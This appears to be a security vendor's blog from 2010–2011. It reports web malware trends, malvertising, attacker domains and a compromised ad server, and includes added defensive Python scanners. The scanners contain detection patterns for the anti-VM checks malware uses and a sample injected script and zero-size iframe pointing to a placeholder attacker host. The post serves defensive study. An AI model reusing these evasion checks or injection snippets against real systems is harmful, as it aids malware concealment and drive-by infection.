Monday, February 7, 2011
NASDAQ Exchange website infected with malware
Thursday, December 23, 2010
Fast Forward: Dasient's Security Predictions for 2011
1) There will be a large botnet cyber war that Zeus will end up winning. Zeus will hold its ground against other botnets that try to attack it. Botnets have been around for over a decade, but have evolved significantly since Tribe Flood Network (TFN), Trin00 and similar tools that were used to attack Amazon, Yahoo, and E*Trade in 2000. While only thousands of clients were used to cripple large web sites 10 years ago, the size of botnets has expanded to hundreds of thousands or millions of clients, botnets have become multi-application (e.g., they are used to send email spam and do keystroke logging in addition to DDoS), and their growth has relied on more and more automated technology. Compromised machines that make up botnets have become a commodity, and while there are still lots of vulnerable, uncompromised machines available for the taking, attackers will eventually start to “butt heads.” While there have been some early indications that attackers have patched machines they have infected to prevent other attackers from stealing them, 2011 will likely be the year that large botnets start competing more aggressively to sustain their growth, and users will get caught in the middle. Zeus has proven its ability to grow to sizes more significant than other botnets, and is also one of the more profitable botnets that targets financial institutions. We expect to see a botnet cyberwar in 2011, and predict that Zeus will come out on top.
2) Human mules will be replaced by malware that does the equivalent job of transferring balances between bank accounts using keystroke-logged credentials. Today, once user credentials such as bank account usernames and passwords are logged on compromised client machines, those credentials are shipped off to botmaster servers, aggregated, and provided to human mules. The human mules most often don’t know they are mules, but think they are doing “work-at-home” types of jobs in which part of their job responsibility is to make monetary transfers between bank accounts. In 2010, we saw some significant arrests of hundreds of such human mules. Just as system architects work to eliminate points of failure when building resilient systems, the cybercriminals will do the same for their operations. If human mules can be arrested and can get in the way of transferring money from the stolen accounts to the cybercriminal’s accounts, they’ll replace the humans with additional malware for that purpose. Writing software to automatically make transfers between bank accounts does require good coding, management of session data, and other such technical details, but can be done rather simply with today's attack and automation tools. As such, like many areas of business today, humans will be taken “out-of-the-loop” to scale cybercriminal operations.
3) We’ll see the first significant HTML5 abuses. The HTML5 standard has been in development for some time, and every major browser now includes some support for it. Some of the features include local browser storage, in which web sites will be able to store more than just cookies on your machine, and support for inline videos without requiring third-party plug-ins such as Flash. With any new functionality comes increased attack surface, and the same will be true for HTML5. We expect to see things like malware authors stuffing malicious code into the local browser storage provided by HTML5 and then having it executed via a browser vulnerability. In addition, as HTML5 has native video tags, we expect to see zero-size video tags used to inject web-based malware, just as we see zero-size IFRAMEs used today to do the same. As HTML5 implementations will be at their newest, cybercriminals will leverage bugs in the early implementations to spread malware.
4) Advanced IM threats will increase and be directed at the use of webcams and audio. Attackers have been using malware to do keystroke logging for years, but as the number of standard input devices on machines increases, so will the attackers' interest in them. Most PCs have built-in microphones, and while there has been some malware that automatically turns on and captures audio and video from these devices, we expect that webcam-logging and audio-logging will become just as popular as keystroke-logging. Malware authors will use the additional logging to build more “ransom-ware” in which they record sensitive conversations and pictures, and will then demand a ransom from individuals and companies by threatening to release the sensitive media onto the Internet or disclose it to interested parties if the ransom is not paid.
5) As the use of social media web sites continues to grow, drive-by-downloads and rogue anti-virus will be used more aggressively on platforms such as Facebook and Twitter. This is evidenced by threats such as the Koobface botnet that continually targets Facebook, as well as the September XSS attack that targeted Twitter and redirected users to porn and malware sites.
Monday, November 22, 2010
Dasient Q3 Malware Update: Web-Based Malware Infections Double Since Last Year, Malvertising Attacks Continue Over Summer
Looking at the major modes of communication used on the Internet, email was one of the first such modes, and we saw attackers take advantage of it by distributing viruses as email attachments. Over time, email became web-based with services such as Hotmail, Yahoo! Mail, and Gmail, and such services had to incorporate anti-virus software on their servers to scan email attachments for malware. As web page views continued to increase and web pages themselves became more and more interactive via Web 2.0 trends, cybercriminals took advantage of the advent of drive-by-download techniques to infect users without requiring the opening of attachments, thereby allowing them to exploit web pages as an increasingly pervasive malware distribution platform.
While attackers continue to grow their use of almost every tool at their disposal (including spreading viruses via email attachment) and as the cybercriminal economy continues to thrive, our research indicates that the use of drive-by-downloads and rogue anti-virus schemes eclipses other modes of malware distribution.
As we approach 2011, we predict that as the usage specifically of social media web sites continues to grow, drive-by-downloads and rogue anti-virus will be used more aggressively on platforms such as Facebook and Twitter, as evidenced by threats such as the Koobface botnet that continually targets Facebook and the September XSS attack that targeted Twitter and redirected users to porn and malware sites. The Koobface authors, for instance, have built “attack modules” for several social media networks including Facebook, MySpace, Twitter, Hi5, Bebo, and Friendster. These attack modules are used to automatically post comment spam with malicious links and distribute fake anti-virus software to users of each of the different social media networks.
Figure 1. Web Malware Growth: Q3 2009 - Q3 2010
Large Government Agencies: Targets of Attack
Another interesting trend that we have observed is that larger and more well-known government agencies are being increasingly targeted by web-based malware infections. As per the table below, from 2008 to 2009, smaller and less-well-known government agency web sites were targeted, while from 2009 to 2010, agencies such as the National Institute of Health (NIH), the US Treasury, and the Environmental Protection Agency had their web sites infected.
| Site | Most Recent Infection | Monthly Page Views |
|---|---|---|
| National Institute of Health | October 2010 | 9,500,000 |
| US Treasury | May 2010 | 435,000 |
| EPA | March 2010 | 1,400,000 |
| Unemployment.gov | July 2009 | Unavailable |
| DC.gov | Feb 2009 | 250,000 |
| Govtrip.com | Feb 2009 | 9,000 |
| UsConsulate.gov | Dec 2008 | 90,000 |
Figure 2. Larger Government Web Sites Infected in 2010. (Monthly page view data obtained from Quantcast)
In previous quarters, we measured that re-infection rates (the probability that a web site, once infected, will be infected again) were high, on the order of 40%, and from the table below we see that government web sites are no exception. The NIH web site has been infected and re-infected five times, with the most recent infection occurring this past October. In addition, the State of Alabama had its site infected and re-infected 37 times before it seemingly locked down the issue in July 2009.
| Site | Number of Times Infected | Last Infection |
|---|---|---|
| NIH.GOV | 5 | 10/2010 |
| CA.GOV | 3 | 8/2010 |
| AL.GOV | 37 | 07/2009 |
| DC.GOV | 16 | 02/2009 |
| WASHINGTONDC.GOV | 4 | 02/2009 |
Figure 3. Re-infection Occurrences for Government Web Sites.
Another interesting government-related malware threat emanated this quarter: Stuxnet, a very high-profile and highly sophisticated Trojan that is believed to have been written by a nation state. Stuxnet has the ability to reprogram automation equipment that controls and monitors critical infrastructure, and has the capability to conduct sabotage with an impact that is yet to be determined. Stuxnet was written to target a Siemens Simatic factory system, and is suspected to have been written to target nuclear reactors in Iran.
While the cybercriminal economy has been using malware explicitly for profit, nation-states may very well be increasing their investments in malware with the intent of preparing for future cyber-warfare scenarios. While Stuxnet propagated via USB sticks, one can imagine that an efficient way to infect critical, government-run infrastructure would be to infect government web sites, which government employees access more often than casual visitors.
Malvertisements Served in Q3: 1.5M per day
In Q3 2010, we estimate that over 1.5 million malvertisements were served online per day, including both drive-by-downloads and fake anti-virus campaigns. Also, our systems measured that the average lifetime of a malvertising campaign was 11.1 days, indicating that malvertisements continue to be an extremely effective means of malware distribution for cybercriminals.
Top 10 Attacker Top-Level-Domains (TLDs)
In Q3, our systems reported that the most popular attacker domains were .com, .ru, and .info, in order of decreasing popularity. As compared to last quarter, there were a few shifts in the origin of attacks based on the TLD of the attackers' code: we saw .cn (China) drop and .ru (Russia) jump.
Figure 4. Attacker Domain TLDs.
Top 10 Attacker Domains
In Figure 5, we show the top 10 attacker domains responsible for drive-by-downloads in Q3. Three of the top domains play on names that contain the word “ads”, which was not the case in previous quarters. Usage of such domain names can be indicative of two things: 1) Attackers know that many sites are dependent on their ads for revenue and are more hesitant to remove resources on the page that relate to their ad revenue sources. Any extra time that a webmaster spends debating whether to remove a widget related to an ad slot is more time that the web site is serving malware. 2) Attacker mindshare is turning more and more to ads. Even if these particular domains were used to spread more traditional web-based malware attacks, an increased focus on malvertising may be just over the horizon.
Of the attacker domains in Figure 5, riotassistance.ru and nuttypiano.com used a very similar attack pattern, and the same exploit kits were running on both domains. Other domains conducting similar attacks that were not included in the top 10, but ranked highly from time to time in our infection library’s top 20 throughout the quarter, include seamscreative.info and addonrock.ru.
Figure 5. Top Attacker Domains.
Top 10 Attacker URLs
The top 10 distinct attacker URLs which were responsible for serving malware are shown in Figure 6. Note that attacker domains in Figure 5 such as riotassistance.ru distribute their attack over 100 distinct URLs (e.g., riotassistance.ru/Java.js, riotassistance.ru/Debugger.js), and hence do not show up in the top 10 distinct attacker URL list even though the combined number of drive-bys conducted by them exceeds the number of drive-bys by any one of the attacker URLs in Figure 5.
Figure 6. Top Attacker URLs.
Anti-Detection Techniques
Malware authors are continuing to deploy increasingly sophisticated attacks to evade detection. They know that the good guys try to run their malware in virtual machines such as VMware and Parallels. As such, the malware authors have their malware do checks at run-time to determine if it might be under a microscope by security researchers or automated scanning engines.
We have a deep understanding of the types of checks that malware authors conduct, and report here on some of the simpler checks we have identified. For instance, to check whether the malware might be under scrutiny in a VMware virtual machine, we have seen malware check whether a file by the name of vmhgfs.sys is present as a device driver under the Windows system directory. Or, to check whether the malware is being analyzed in Parallels, it checks for a device driver by the name of prleth.sys.
Other anti-detection mechanisms range from checking for running processes and loaded modules to verifying system BIOS information and counting the number of CPU cycles to execute blocks of code. While these are not new or advanced tactics, we are seeing them more often and earlier in the infection process.
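As an added example (not code from the post or from Dasient), the Python triage script below looks for the artifacts this section describes in a sample's bytes: the vmhgfs.sys and prleth.sys driver names, hypervisor vendor strings that a BIOS-information check would compare against (assumed typical, not named in the post), and paired rdtsc instructions, which is how counting the CPU cycles of a code block is usually written. The sample bytes are constructed.

```python
"""Static triage for the anti-analysis checks described in this section.

Constructed example, not Dasient's code. Driver names come from the post;
the hypervisor vendor strings and the rdtsc-pair rule are assumptions.
"""
from __future__ import annotations

import re

# Driver names come from the post; vendor strings are assumed typical.
STRING_INDICATORS = {
    b"vmhgfs.sys": "vmware-driver-check",
    b"prleth.sys": "parallels-driver-check",
    b"VMware": "bios-vendor-string",
    b"Parallels": "bios-vendor-string",
    b"VirtualBox": "bios-vendor-string",
}

RDTSC = b"\x0f\x31"  # x86 "read time-stamp counter" opcode


def utf16le(s: bytes) -> bytes:
    """Windows binaries often store paths as UTF-16LE; match that form too."""
    return s.decode("ascii").encode("utf-16-le")


def find_string_indicators(data: bytes) -> dict[str, list[str]]:
    """Map indicator type -> matched strings (ASCII or wide, case-insensitive)."""
    hits: dict[str, list[str]] = {}
    lower = data.lower()  # bytes.lower() only touches ASCII, so wide forms survive
    for needle, kind in STRING_INDICATORS.items():
        for form in (needle.lower(), utf16le(needle).lower()):
            if form in lower:
                name = needle.decode("ascii")
                if name not in hits.setdefault(kind, []):
                    hits[kind].append(name)
    return hits


def has_timing_check(data: bytes, window: int = 64) -> bool:
    """True if two rdtsc opcodes sit within `window` bytes: read, run block, read."""
    positions = [m.start() for m in re.finditer(re.escape(RDTSC), data)]
    return any(b - a <= window for a, b in zip(positions, positions[1:]))


def triage(data: bytes) -> dict:
    """Summarise evasion indicators; the score counts distinct indicator types."""
    hits = find_string_indicators(data)
    if has_timing_check(data):
        hits["rdtsc-timing-check"] = ["0f 31 x2"]
    return {"indicators": hits, "evasion_score": len(hits)}


# Constructed sample: a stub header, the VMware driver path as a wide string,
# the Parallels driver name as ASCII, and an rdtsc / filler / rdtsc sequence.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + utf16le(b"C:\\Windows\\System32\\drivers\\vmhgfs.sys")
    + b"\x00" * 8 + b"prleth.sys\x00"
    + RDTSC + b"\x89\xc6" + b"\x90" * 20 + RDTSC + b"\x29\xf0"
)
BENIGN = b"MZ\x90\x00" + b"nothing to see here, just text " * 4

if __name__ == "__main__":
    print(triage(SAMPLE))   # 3 indicator types
    print(triage(BENIGN))   # 0
```

The string matches are only a triage signal: a legitimate VMware guest tool would reference the same driver, so the score should drive a closer look rather than a verdict.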
Summary
Our Q3 Malware Update continues to show that websites are at an increasing risk of being compromised. Not only are hackers becoming smarter at finding new ways of spreading malware, the attacks themselves are also becoming more sophisticated and devastating. Without structurally protecting websites through monitoring, businesses and government organizations with an online presence are at an increasingly higher risk of being infected and of suffering the consequences. The sharp rise of social networking sites only expands the threat landscape, and proper web security protection becomes a must.
Wednesday, September 22, 2010
Third party application infects a Quantcast 100 site
The publisher site used a script tag to source in an external JavaScript snippet. Normally, this third-party script adds image tags to the publisher page. The third party uses an ad server application to manage such images, and the application keeps these image tags in the “zones” table in its database.
In this incident, the attackers successfully injected malicious JavaScript tags into the zones table by exploiting a vulnerability found in ad server versions before 2.8.7. When users visited the publisher site, they received the image tags as well as the malicious JavaScript tags, which silently downloaded a Java virtual machine exploit (CVE-2009-3867, CVE-2010-0886) to install two drive-by-downloads on the user’s computer.
More information about the attack can be found at these links:
http://blog.openx.org/09/security-update-how-to-secure-your-openx-installation/
http://blog.sucuri.net/2010/09/openx-users-time-to-upgrade.html
As we reported in the Q2 malware update, 75% of web sites use external, third-party JavaScript widgets, 42% of web sites use third-party ad-related resources, and 91% of web sites use third-party applications and/or out-of-date software. In this attack, it was the compromise of a third-party application that led to the infection of the publisher site. In other words, a structural vulnerability on the publisher site was exploited. Traditional signature-based approaches, which have very low (or zero) detection of these drive-by-downloads, fail to prevent thousands of users from getting infected. Therefore we keep on emphasizing how important it is to use behavioral approaches, and to monitor ads as well as all kinds of third-party content (including widgets) on websites.
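The behavioral monitoring argued for above, as an added example (not Dasient's or OpenX's code): the publisher expected the third-party snippet to add only image tags, so the audit below parses what the zone actually emits and reports anything else, such as an injected script or iframe tag, an inline event handler, a javascript: URL, or an image from a host other than the expected creative host. The allowed hosts, tag list and snippets are constructed.

```python
"""Behavioural check on what a third-party ad zone emits, per the incident above.

Constructed example, not Dasient's or OpenX's code. ALLOWED_TAGS and
ALLOWED_IMG_HOSTS stand in for what a publisher knows its zone should render.
"""
from __future__ import annotations

from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"a", "img", "div", "span", "br"}   # what the zone normally renders
ALLOWED_IMG_HOSTS = {"ads.example-adserver.test"}  # assumed known creative host


class ZoneAuditor(HTMLParser):
    """Collects deviations from the expected image-only output of an ad zone."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        attrs = dict(attrs)
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"unexpected <{tag}> tag")
        for name, value in attrs.items():
            if name.startswith("on"):
                self.findings.append(f"inline event handler {name} on <{tag}>")
            if value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} on <{tag}>")
        if tag == "img":
            host = urlparse(attrs.get("src") or "").hostname
            if host not in ALLOWED_IMG_HOSTS:
                self.findings.append(f"image from unexpected host {host!r}")


def audit_zone_output(html: str) -> list[str]:
    """Return the findings; an empty list means the snippet is as expected."""
    auditor = ZoneAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed zone outputs: the clean one is what the zones table should hold;
# the tampered one carries an injected script tag and a zero-size iframe, both
# of which are flagged simply because they are not image-rendering tags.
CLEAN_ZONE = (
    '<a href="https://ads.example-adserver.test/click?zone=12">'
    '<img src="https://ads.example-adserver.test/creative12.gif" '
    'width="300" height="250" alt=""></a>'
)
TAMPERED_ZONE = CLEAN_ZONE + (
    '<script src="http://attacker-host.invalid/loader.js"></script>'
    '<iframe src="http://attacker-host.invalid/x.html" width="0" height="0"></iframe>'
)

if __name__ == "__main__":
    print(audit_zone_output(CLEAN_ZONE))     # []
    print(audit_zone_output(TAMPERED_ZONE))  # two unexpected-tag findings
```

Fetching the snippet from the publisher's own vantage point on a schedule and diffing its findings is what turns this into monitoring rather than a one-off check.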
Tuesday, September 14, 2010
Continued growth in web-based malware attacks -- over 1M web sites infected in Q2 2010
Over 1M Web Sites Infected
In Q2 2010, we estimate that 1.3 million web sites were infected, based on data from our telemetry systems. Q2 was the first quarter in history for which we believe that over one million web sites were infected in a three-month period. As we have now been tracking web-based malware statistics for four quarters, we have plotted the estimated number of infected web sites over that time period below. While there was a slight dip in Q4 ‘09 (it looks like some cybercriminals took part of the holiday season off just like the rest of us), the growth over the past couple of quarters has been significant: growth by a factor of two over the past year. We should note that while the measured growth below is mostly due to increased activity on the part of cybercriminals, a part of it is due to improvements to the methodology and the number of sites monitored by our telemetry.
In addition to trends that we gathered on web-based malware in general, we also studied trends in the more specific area of malvertising. Over all of Q2, based on the part of our telemetry that monitors dozens of ad networks, we estimate that over 1.6 million malvertisements are served on an average day, which represents an approximate increase of just over 20% from an estimate that we produced in mid-Q2. In addition, the average lifetime of a malvertising campaign was 11.5 days, an increase of over 50% from a measurement that we did in mid-Q2. Kicking off malvertising campaigns on weekends gives cybercriminals a couple of extra days of lifetime, as IT teams often don’t get to look in depth into attacks over the weekends (unless they have automated solutions in place such as Dasient’s anti-malvertising service), and the intermittent nature with which malvertising creatives are served makes them harder to track and lock down, which contributes to the lifetime of the malvertising campaigns.
We observed that malvertising attacks have a high propensity for being launched closer to weekends, as per the graph below. Fridays and Saturdays were the most common days for the launch of malvertising attacks. Thursdays came in next, with Sunday following. Cybercriminals know that corporate IT teams are slower to respond to attacks over the weekend, so they launch their attacks on and near the weekends to maximize the impact of their attack. Big money can be made via Fake Anti-Virus operations (see the eWeek article at http://www.eweek.com/c/a/Security/3-Indicted-in-100-Million-Rogue-AntiVirus-Operation-696172/ for an example where over $100M was minted by the cybercriminals), so every minute that the attack is live is critical.
Underlying Issue: Structural Vulnerabilities
The structural vulnerabilities research report that we issued this past July, just prior to the BlackHat 2010 security conference, highlighted the multitude of attack vectors that cybercriminals have at their disposal, and it appears that they are taking advantage of them. Structural vulnerabilities are ones in which a web site relies on third-party resources as part of the composition of the site, and when third-party resources get targeted or compromised, so do all the web sites that use those resources. Our key focus in this malware update is reviewing Q2 malware statistics, but we briefly review some of our findings from our structural vulnerabilities report that underlie the acceleration of the spread of web-based malware, while providing some new concrete examples:
* 75% of web sites use external, third-party JavaScript widgets. Traffic and audience measurement widgets, for instance, are popular choices as targets. Forty-three percent of the top Alexa 100,000 web sites use widgets such as Google Analytics and JQuery (as per Stanford University research presented at this past July’s BlackHat security conference in Las Vegas). While we have thus far not seen a mass compromise due to widgets, such an attack, say via DNS cache poisoning against a popular ISP, is not simply a theoretical possibility (see http://www.digitalsanctuary.com/tech-blog/security/att-dns-cache-poisoning.html). When these attacks occur, every web site that uses these widgets can become a malware distribution vehicle, with users getting infected simply by loading such pages. Note also that in cases where DNS cache poisoning is used, the widget provider does not need to be compromised; only the ISPs do.
* 42% of web sites use third-party ad-related resources. Financial web sites are just as likely as the average web site to use ad-related resources, often to manage their own in-house ads and/or to show third-party ads on auxiliary sites that they run in which users can give each other financial advice, or on other user-generated-content offerings they make available. Publisher sites are twice as likely as the average web site to show third-party ads, and there has been an uptick in malvertising attacks this year.
* 91% of web sites use third-party applications and/or out-of-date software. It has been known for some time that keeping client-side software patched is a challenge, but keeping software on servers patched is just as hard or even harder. Upgrading server-side software, whether it be the version of the web server, the application server, language modules (PHP, ASP.NET, etc.), or web applications, can require porting of data and code; it is often a non-trivial exercise and doesn’t get done in a very timely fashion. As cybercriminals can easily look up all the known security vulnerabilities for such server-side software and use available exploit kits, web sites running old or out-of-date server-side software can be turned into distribution vehicles for malware by exploiting known vulnerabilities.
Infection Library Growth
During Q2, Dasient’s automated systems added over 58,000 unique entries to its infection library. Unlike the infection libraries of traditional anti-virus companies, Dasient’s infection library catalogs web-based code snippets that cybercriminals inject and use to compromise web sites and ad networks. In Q2, over 43,000 JavaScripts and over 15,000 IFRAMEs were added to Dasient’s infection library. As a percentage of the total number of new entries, JavaScript samples have increased by 19%, and JavaScript samples now make up 74% of the entries for the quarter (as compared to 55% three quarters ago).
| Q2 2010 | Share of New Entries | Increase/Decrease (as a percentage of total) |
|---|---|---|
| JavaScript injections | 74% | +19% |
| IFRAME injections | 26% | -11% |
Why use JavaScripts instead of IFRAMEs? JavaScripts have some advantages from the standpoint of an attacker. Most significantly, JavaScripts have access to the DOM elements in the rest of the page, thereby giving attackers more information and more capability to “muck” with the page. For example, an injected JavaScript has access to the page referrer, the URL address bar, the user’s cookie, and has the ability to write new, potentially malicious content into the web page. Scripts sourced in via IFRAMEs, by comparison, do not have the capability to access or communicate with the rest of the page.
Top Attacker Domains and Top-Level-Domains (TLDs)
As a part of our look into our growing infection library, we studied the most frequently occurring attacker domains used in SRC fields in malicious JavaScripts and IFRAMEs, as shown in the graphs below. Attackers seem to use more .com domains in aggregate, as they want their domain names to seem as “legitimate” as possible and Chinese domain names tend to arouse suspicion. While the cybercriminal community seems to be using more .com domains in aggregate, specific .cn domains (such as the ones listed in the chart below) are more frequently used than their .com counterparts. We see that some of the domain names end in .com.cn (as in ustocn.com.cn), which have been accounted for as .cn domains in our study but seek to look more legitimate, as domains that have a .com followed by a country code are used by many legitimate organizations in many countries.
We also looked at just the top-level domains (TLDs) that attackers used. Comparing the chart below with similar statistics from Q1 2010, we see that the attackers are using significantly more .info domains than in the previous quarter. In Q1, .info domains took a backseat to .net, .org, and .ru domains, but they jumped ahead of all those TLDs in Q2.
Attacker Domain TLDs for Q2 2010
For Q1 2010
Drive-By Naming and Locations
When attackers send drive-by-downloads, they seem to like to choose one-letter file names and innocent-looking names like updates.exe and file.exe. Sometimes the file name starts with MS to imitate Microsoft processes. There is also a class of attacks that choose a random file name with a fixed number of characters.
Temp and application data folders are the favorite choice of folders in which to store malicious executables. However, executables are sometimes copied to the system directory after their initial storage, and run from there.
Overall, three out of four drive-by-downloads have one letter filenames and are written to the User’s Application Data directory.
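The naming and location patterns above, turned into endpoint detection heuristics as an added example (not Dasient's code): each executable-write event is tagged with the traits the post reports (one-letter name, decoy names such as updates.exe and file.exe, an MS prefix, a fixed-length random-looking name, a Temp or Application Data destination, a later copy into the system directory), and the most common flagged name is reported the way the f.exe statistic is. The Windows Vista/7 AppData paths, the randomness rule and the event list are assumptions and constructed data.

```python
"""Heuristics for the drive-by naming and location patterns described above.

Constructed example, not Dasient's code. Decoy names and the XP folder layout
come from the post; the Vista/7 folders and the randomness rule are assumed.
"""
import ntpath
import re
from collections import Counter

DECOY_NAMES = {"updates.exe", "file.exe"}  # named in the post
STAGING_DIRS = (
    "\\local settings\\temp\\", "\\application data\\",   # Windows XP layout
    "\\appdata\\local\\temp\\", "\\appdata\\roaming\\",   # assumed: Vista/7 layout
)
SYSTEM_DIR = "\\windows\\system32\\"


def looks_random(stem: str) -> bool:
    """Assumed rule: 6-12 alphanumerics with several digits or no vowels at all."""
    if not re.fullmatch(r"[a-z0-9]{6,12}", stem):
        return False
    return sum(c.isdigit() for c in stem) >= 2 or not re.search(r"[aeiou]", stem)


def name_traits(path: str) -> list:
    """Return the traits from the post that this executable path exhibits."""
    lowered = path.lower().replace("/", "\\")
    name = ntpath.basename(lowered)
    stem, ext = ntpath.splitext(name)
    traits = []
    if ext != ".exe":
        return traits
    if len(stem) == 1:
        traits.append("one-letter-name")
    if name in DECOY_NAMES:
        traits.append("decoy-name")
    if stem.startswith("ms") and len(stem) > 2:
        traits.append("ms-prefix")
    if looks_random(stem):
        traits.append("random-looking-name")
    if any(d in lowered for d in STAGING_DIRS):
        traits.append("staging-dir")
    if SYSTEM_DIR in lowered:
        traits.append("system-dir")
    return traits


def is_drive_by_like(path: str) -> bool:
    """Flag when a suspicious name lands in a staging or system directory."""
    traits = set(name_traits(path))
    name_hit = traits & {"one-letter-name", "decoy-name", "ms-prefix", "random-looking-name"}
    return bool(name_hit) and bool(traits & {"staging-dir", "system-dir"})


def triage_events(paths):
    """Return (flagged paths, most common flagged file name or None)."""
    flagged = [p for p in paths if is_drive_by_like(p)]
    names = Counter(ntpath.basename(p).lower() for p in flagged)
    return flagged, (names.most_common(1)[0][0] if names else None)


# Constructed file-write events from two hosts (XP and Windows 7 layouts).
EVENTS = [
    r"C:\Documents and Settings\alice\Application Data\f.exe",
    r"C:\Documents and Settings\alice\Local Settings\Temp\updates.exe",
    r"C:\Users\bob\AppData\Roaming\f.exe",
    r"C:\Users\bob\AppData\Local\Temp\x7k2q9pw.exe",
    r"C:\Users\bob\AppData\Local\Temp\msupdate.exe",
    r"C:\Windows\System32\f.exe",  # copied there after initial staging
    r"C:\Program Files\Mozilla Firefox\firefox.exe",
    r"C:\Users\bob\Downloads\report.pdf",
]

if __name__ == "__main__":
    flagged, top = triage_events(EVENTS)
    print(len(flagged), "flagged; most common name:", top)  # 6 flagged; f.exe
```

Legitimate installers also write to Temp, so in practice the trait list is a prioritisation signal to pair with the download's origin (the drive-by URL) rather than a standalone verdict.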
Summary / Conclusion:
To summarize, some of the most interesting statistics from our Q2 malware update are:
* We estimate that 1.3 million web sites were infected in Q2 2010 (almost a 2x jump as compared to Q1)
* We estimate that for Q2, on average 1.6 million malvertisements were served on a daily basis.
* Our infection library grew by 58K entries, with relatively more JavaScript injections as compared to IFRAMEs than in previous quarters
* Attackers use .com and .cn domains most frequently to host malicious code. There has been a rise in .info domains being infected and used to host malicious code.
* Three out of four drive-by-downloads have one letter filenames and are written to the User’s Application Data directory. The most common name for a drive-by-download was f.exe.
Hackers are going to continue to become more sophisticated. The malware epidemic is not slowing down - on the contrary, it’s exploding. Now is the time for businesses to educate themselves on how they can put safe security practices in place for their websites to protect their customers, their brand and their revenue. The first step is to make sure they are not exposed by monitoring their websites for malware regularly.
If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.
Keep your sites safe!
Your Dasient Team